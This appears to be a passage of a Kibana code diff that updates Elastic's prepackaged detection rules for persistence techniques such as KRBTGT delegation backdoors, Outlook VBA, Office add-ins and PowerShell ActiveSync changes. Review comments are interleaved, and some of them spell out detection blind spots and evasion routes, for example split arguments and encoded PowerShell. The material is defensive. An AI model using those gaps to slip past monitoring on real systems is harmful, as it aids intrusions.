rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_linux_anomalous_process_all_hosts.json
index 76c8cd29fc8e8..f517465a110e5 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_process_all_hosts.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_linux_anomalous_process_all_hosts.json
@@ -26,8 +26,33 @@
 "Host",
 "Linux",
 "Threat Detection",
- "ML"
+ "ML",
+ "Persistence"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1543",
+ "name": "Create or Modify System Process",
+ "reference": "https://attack.mitre.org/techniques/T1543/",
+ "subtechnique": [
+ {
+ "id": "T1543.003",
+ "name": "Windows Service",
+ "reference": "https://attack.mitre.org/techniques/T1543/003/"
+ }
+ ]
+ }
+ ]
+ }
 ],
 "type": "machine_learning",
- "version": 8
+ "version": 9
 }
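Review bot: The subtechnique added in this hunk is `T1543.003` "Windows Service", but the rule is tagged `"Linux"` on a context line of the same hunk, so the ATT&CK mapping contradicts the platform the rule covers; the next hunk (L2931, `persistence_ml_rare_process_by_host_linux.json`) has the same mismatch. Either drop the `subtechnique` array and keep only the parent `T1543`, as the hunks at L2934 and L2935 do, or use the Linux-specific subtechnique (T1543.002, Systemd Service) if that is what these jobs are meant to surface. Since these are generic anomalous-process ML jobs rather than service-creation detections, the parent-only mapping looks like the safer claim.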
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_linux.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_linux.json similarity index 73% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_linux.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_linux.json index c873e6d7c1d8e..d9f78c5f76499 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_linux.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_linux.json @@ -26,8 +26,33 @@ "Host", "Linux", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 8 + "version": 9 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_windows.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_windows.json similarity index 85% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_windows.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_windows.json index bf08c731bedd1..ac75504356320 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_rare_process_by_host_windows.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_rare_process_by_host_windows.json @@ -26,8 +26,33 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 11 + "version": 12 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_path_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_path_activity.json similarity index 67% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_path_activity.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_path_activity.json index b7c80f05828e4..b913cd20ce1c2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_path_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_path_activity.json @@ -25,8 +25,33 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 6 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_all_hosts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_all_hosts.json
similarity index 85%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_all_hosts.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_all_hosts.json
index fe7a5f2311f52..1b490f6231b67 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_all_hosts.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_all_hosts.json
@@ -26,8 +26,26 @@
 "Host",
 "Windows",
 "Threat Detection",
- "ML"
+ "ML",
+ "Persistence"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1543",
+ "name": "Create or Modify System Process",
+ "reference": "https://attack.mitre.org/techniques/T1543/"
+ }
+ ]
+ }
 ],
 "type": "machine_learning",
- "version": 8
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_creation.json similarity index 77% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_creation.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_creation.json index 77dee22bcf35a..358c79a68999f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_process_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_process_creation.json @@ -25,8 +25,26 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } ], "type": "machine_learning", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_service.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_service.json similarity index 61% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_service.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_service.json index bdc22e6bd8745..c96039edb1f30 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_service.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_windows_anomalous_service.json @@ -25,8 +25,33 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_modification_sublime_app_plugin_or_script.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_modification_sublime_app_plugin_or_script.json index 73987426827a8..f5f35e1261629 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_modification_sublime_app_plugin_or_script.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_modification_sublime_app_plugin_or_script.json 
@@ -11,13 +11,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Sublime Plugin or Application Script Modification", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type in (\"change\", \"creation\") and file.extension : \"py\" and\n file.path : \n (\n \"/Users/*/Library/Application Support/Sublime Text*/Packages/*.py\", \n \"/Applications/Sublime Text.app/Contents/MacOS/sublime.py\"\n ) and\n not process.executable : \n (\n \"/Applications/Sublime Text*.app/Contents/MacOS/Sublime Text*\", \n \"/usr/local/Cellar/git/*/bin/git\", \n \"/usr/libexec/xpcproxy\", \n \"/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/Resources/DesktopServicesHelper\", \n \"/Applications/Sublime Text.app/Contents/MacOS/plugin_host\"\n )\n", + "note": "", + "query": "file where event.type in (\"change\", \"creation\") and file.extension : \"py\" and\n file.path :\n (\n \"/Users/*/Library/Application Support/Sublime Text*/Packages/*.py\",\n \"/Applications/Sublime Text.app/Contents/MacOS/sublime.py\"\n ) and\n not process.executable :\n (\n \"/Applications/Sublime Text*.app/Contents/*\",\n \"/usr/local/Cellar/git/*/bin/git\",\n \"/Library/Developer/CommandLineTools/usr/bin/git\",\n \"/usr/libexec/xpcproxy\",\n \"/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/Resources/DesktopServicesHelper\"\n )\n", "references": [ "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.executable", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -45,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_office_addins_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_office_addins_file.json index d01c80193d132..145af62c072e6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_office_addins_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_office_addins_file.json 
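Review bot: The rewritten `process.executable` exclusion in the Sublime rule's query (hunk starting at L2937) replaces the two specific binaries `"/Applications/Sublime Text*.app/Contents/MacOS/Sublime Text*"` and `".../MacOS/plugin_host"` with `"/Applications/Sublime Text*.app/Contents/*"`, which exempts every executable anywhere under the application bundle rather than the two that legitimately write `Packages/*.py`. For a persistence rule whose purpose is to catch writes to those plugin paths, that is a wider blind spot than the change seems to need; keeping the two narrow paths and adding the new `"/Library/Developer/CommandLineTools/usr/bin/git"` entry alongside them preserves coverage. If the broader pattern was needed for a concrete false positive, the commit description should record it, since the JSON file cannot carry a comment.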
@@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Microsoft Office AddIns", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type != \"deletion\" and\n file.extension : (\"wll\",\"xll\",\"ppa\",\"ppam\",\"xla\",\"xlam\") and\n file.path :\n (\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\Startup\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\AddIns\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel\\\\XLSTART\\\\*\"\n )\n", "references": [ "https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +64,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_outlook_vba_template.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_outlook_vba_template.json index da114ee50ea96..b4ef4b6035b67 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_outlook_vba_template.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_outlook_vba_template.json @@ -15,14 +15,27 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Microsoft Outlook VBA", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type != \"deletion\" and\n file.path : \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM\"\n", "references": [ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -50,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_msds_alloweddelegateto_krbtgt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_msds_alloweddelegateto_krbtgt.json index 2895fef234f7b..a6f3e730703d4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_msds_alloweddelegateto_krbtgt.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_msds_alloweddelegateto_krbtgt.json 
@@ -11,14 +11,32 @@ "language": "kuery", "license": "Elastic License v2", "name": "KRBTGT Delegation Backdoor", - "note": "## Config\n\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nAccount Management > \nAudit User Account Management (Success,Failure)\n```\n", + "note": "", "query": "event.action:modified-user-account and event.code:4738 and winlog.event_data.AllowedToDelegateTo:*krbtgt*\n", "references": [ "https://skyblue.team/posts/delegate-krbtgt", "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0026_windows_audit_user_account_management.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AllowedToDelegateTo", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -62,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } 
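Review bot: The new `required_fields` entry declares `winlog.event_data.AllowedToDelegateTo` with `"type": "unknown"`, yet the query relies on a leading-and-trailing wildcard `*krbtgt*` against that field, whose behaviour (case sensitivity, per-token vs whole-value matching, cost) depends entirely on how the field is mapped. On a `keyword` mapping the match is case-sensitive, which is fine for the `krbtgt/DOMAIN` form 4738 normally emits but would miss a mixed-case value; on a `text` mapping the wildcard applies per analyzed token. Since `setup` is being introduced in this hunk, pin the expectation there, e.g. append `The rule expects winlog.event_data.AllowedToDelegateTo to be indexed as a keyword (confirm against the Winlogbeat/Elastic Agent mapping in use).`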
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_or_delete_application_sign_on_policy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.json similarity index 59% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_or_delete_application_sign_on_policy.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.json index 20e52ad1aca7b..cf64ed5655d2f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_or_delete_application_sign_on_policy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.json 
@@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Modification or Removal of an Okta Application Sign-On Policy", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:(application.policy.sign_on.update or application.policy.sign_on.rule.delete)\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Security/App_Based_Signon.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "cd16fb10-0261-46e8-9932-a0336278cdbe", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -29,9 +48,27 @@ "Okta", "Continuous Monitoring", "SecOps", - "Identity and Access" + "Identity and Access", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_periodic_tasks_file_mdofiy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_periodic_tasks_file_mdofiy.json index 2df59206645b4..c0d43c8768560 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_periodic_tasks_file_mdofiy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_periodic_tasks_file_mdofiy.json @@ -17,6 +17,23 @@ "https://www.oreilly.com/library/view/mac-os-x/0596003706/re328.html", "https://github.com/D00MFist/PersistentJXA/blob/master/PeriodicPersist.js" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "48ec9452-e1fd-4513-a376-10a1a26d2c83", "severity": "low", @@ -53,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_powershell_exch_mailbox_activesync_add_device.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_powershell_exch_mailbox_activesync_add_device.json index ecaa09e538cf7..9ec41a5346815 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_powershell_exch_mailbox_activesync_add_device.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_powershell_exch_mailbox_activesync_add_device.json 
@@ -15,14 +15,32 @@ "language": "eql", "license": "Elastic License v2", "name": "New ActiveSyncAllowedDeviceID Added via PowerShell", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and process.args : \"Set-CASMailbox*ActiveSyncAllowedDeviceIDs*\"\n", "references": [ "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", "https://docs.microsoft.com/en-us/powershell/module/exchange/set-casmailbox?view=exchange-ps" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -47,7 +65,7 @@ "subtechnique": [ { "id": "T1098.002", - "name": "Exchange Email Delegate Permissions", + "name": "Additional Email Delegate Permissions", "reference": "https://attack.mitre.org/techniques/T1098/002/" } ] @@ -57,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } 
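Review bot: `process.args : "Set-CASMailbox*ActiveSyncAllowedDeviceIDs*"` is evaluated per argv element, so it only fires when the cmdlet and the parameter arrive inside one argument (for example a quoted `-Command` string); if they are split into separate elements, or delivered via `-EncodedCommand`, a script file or an interactive session, the rule does not see them, and the `required_fields` added here document only `process.args`. Adding `or process.command_line : "*Set-CASMailbox*ActiveSyncAllowedDeviceIDs*"` (and listing `process.command_line` in `required_fields`) closes the split-argument case; the encoded/scripted paths would need script-block logging and are worth a sentence in `setup` as a known blind spot. The query body is fully visible in this hunk.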
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_priv_escalation_via_accessibility_features.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_priv_escalation_via_accessibility_features.json index e9f510c112fbf..d01d1629e3054 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_priv_escalation_via_accessibility_features.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_priv_escalation_via_accessibility_features.json 
@@ -12,13 +12,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Modification of Accessibility Binaries", - "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by\naccessibility features. Windows contains accessibility features that may be launched with a key combination before a\nuser has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs\nare launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features\nbinaries' original file names, which is likely a custom binary deployed by the attacker.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive\n(B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by\naccessibility features. Windows contains accessibility features that may be launched with a key combination before a\nuser has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs\nare launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found 